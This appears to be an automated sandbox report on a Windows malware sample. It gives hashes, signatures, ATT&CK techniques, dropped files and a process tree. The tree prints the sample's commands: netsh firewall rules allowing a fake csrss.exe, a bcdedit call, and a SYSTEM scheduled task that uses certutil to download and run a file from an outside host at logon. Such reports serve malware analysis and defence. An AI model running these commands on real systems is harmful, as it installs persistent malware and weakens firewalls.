dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d

General

Target

dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
Size

3.8MB
MD5

cf300ac61d822819800e96198b91b1c9
SHA1

9daa6f31bbc1d329bfb4180e33f8c97402868a5b
SHA256

dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d
SHA512

86837965dce13c2f8da00b19806e18fde09b18913feb9ab3866c8cffb8c5cb6613a79e8c8d514e1a5a18541cc2121c60e7c3efa88ab7c20112e68ddc47d3fdc3

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4044 bcdedit.exe

pid	process
4044	bcdedit.exe

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	process	target process
2924	2764	WerFault.exe	dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
5048	2116	WerFault.exe	dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

868 schtasks.exe
1712 schtasks.exe

pid	process
868	schtasks.exe
1712	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
"C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"
1⤵
PID:2764

C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe
"C:\Users\Admin\AppData\Local\Temp\dd869fd51dc2ace42763d629fc8ed6caf209ddd71b41d6aedd7a7a1ab79ffb9d.exe"
2⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:3672

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
3⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 692
3⤵
- Program crash
PID:5048

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:2056

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:4044

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:4536

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:868

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 856
2⤵
- Program crash
PID:2924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:1896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2764 -ip 2764
1⤵
PID:2364

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
1⤵
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2116 -ip 2116
1⤵
PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
233KB

MD5
f4e16aeaafd025b19e1cc7953d99eea4

SHA1
dbd9595469aa99b55656030088348f22f0eb8ebe

SHA256
3a0040b7daa8b1834fd7b6026c64eaa5d213df422752c28ea10fd027dc4839da

SHA512
e785cc3cf3d552104eb59b1f900f178c1ce34c41ccb5530a8b93c9dbd7703f1d646913deefa5b5b3ecd0088b129969b15c914ef2132874b7f3809de84a2ccf60

Download Submit
C:\Windows\rss\csrss.exe
Filesize
282KB

MD5
6ec88097f2630e5082b02859812e386d

SHA1
6f13e04f8c2d1d7fbde949ba6c309ed438ed8a72

SHA256
fac8ea804a36d647ac09ab94e21bb19a05b2cebd78917116c508da7973499613

SHA512
396038a28c3a204b6891c0b95b8b47cf3559756d41fa9b003cab9e5c139197b2f14fe00803a8a75846cf601029788cbae4200fab0a6596d0232bf770af5b0f88

Download Submit
C:\Windows\rss\csrss.exe
Filesize
181KB

MD5
24a9dad4c62947204e900fb1d6425c8a

SHA1
acec4d3b171339e1916aa173005618525c632489

SHA256
b733206522b752b94ab477776634207676ee7ccf065e4fec0fa172cdf693b30a

SHA512
9ef1b1d493a1eba98352ba837ca4ee394463a7e6fe5bf54a7e32853384eebd590e0bfc62f982c39451f8f7912963d84d8b842ad6a3ba53be96a3c13cebca9d6b

Download Submit
memory/868-144-0x0000000000000000-mapping.dmp

Download
memory/1712-143-0x0000000000000000-mapping.dmp

Download
memory/2056-140-0x0000000000000000-mapping.dmp

Download
memory/2056-149-0x0000000000400000-0x000000000281E000-memory.dmp

Filesize
36.1MB

Download
memory/2056-145-0x0000000004A00000-0x0000000004DA6000-memory.dmp

Filesize
3.6MB

Download
memory/2116-137-0x0000000000400000-0x000000000281E000-memory.dmp

Filesize
36.1MB

Download
memory/2116-133-0x0000000000000000-mapping.dmp

Download
memory/2116-136-0x000000000450D000-0x00000000048B3000-memory.dmp

Filesize
3.6MB

Download
memory/2184-139-0x0000000000000000-mapping.dmp

Download
memory/2764-130-0x0000000004635000-0x00000000049DB000-memory.dmp

Filesize
3.6MB

Download
memory/2764-132-0x0000000000400000-0x000000000281E000-memory.dmp

Filesize
36.1MB

Download
memory/2764-131-0x00000000049E0000-0x00000000050D5000-memory.dmp

Filesize
7.0MB

Download
memory/3672-134-0x0000000000000000-mapping.dmp

Download
memory/4044-148-0x0000000000000000-mapping.dmp

Download
memory/4528-138-0x0000000000000000-mapping.dmp

Download
memory/4536-146-0x0000000000000000-mapping.dmp

Download
memory/4588-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads